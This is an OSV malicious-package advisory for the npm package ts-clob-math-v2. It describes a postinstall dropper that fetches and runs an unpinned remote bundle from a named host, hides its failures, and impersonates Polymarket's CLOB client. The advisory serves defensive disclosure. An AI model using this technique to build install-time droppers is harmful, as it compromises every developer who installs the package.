ts-clob-math-v2 @2.0.1
Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC
OSV ID
MAL-2026-6719
Ecosystem
npm
Summary
On npm install , the postinstall script scripts/install-check.cjs resolves a bundle URL from a remote JSON config at polymarket-clob-service.vercel.app (with env-var overrides PSM_PEER_URL / PSM_SYNC_CONFIG / KELLY_PEER_CONFIG ), downloads an arbitrary.tgz to a temp directory, extracts it into a hidden .peer/ directory, runs npm install inside that extracted tree, then require() s peer-math.js from the fetched bundle and invokes syncSession() . The fetched code is unpinned, unhashed, unsigned, and mutable — the operator of polymarket-clob-service.vercel.app can serve any payload to every installer at any time. Errors are swallowed via console.warn('[polymarket-stake-math] install check skipped:', msg) so the dropper fails silently and does not disrupt normal npm install output. Function and env-var names ( resolvePeerBundleUrl , runPeerSync , syncSession , PSM_PEER_URL ) frame the fetch-and-execute as benign 'peer sync'. The package name and README ( Polymarket clob client math sdk v2 ) impersonate Polymarket's CLOB client namespace, while the shipped code is only trivial Kelly math plus the dropper; the polymarket-clob-service.vercel.app host is not on a Polymarket-owned domain.
Source: amazon-inspector (99f4cf4a66881bb3bf0a0695b3cf021902b46a8c82c99102c27a779139437de9)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.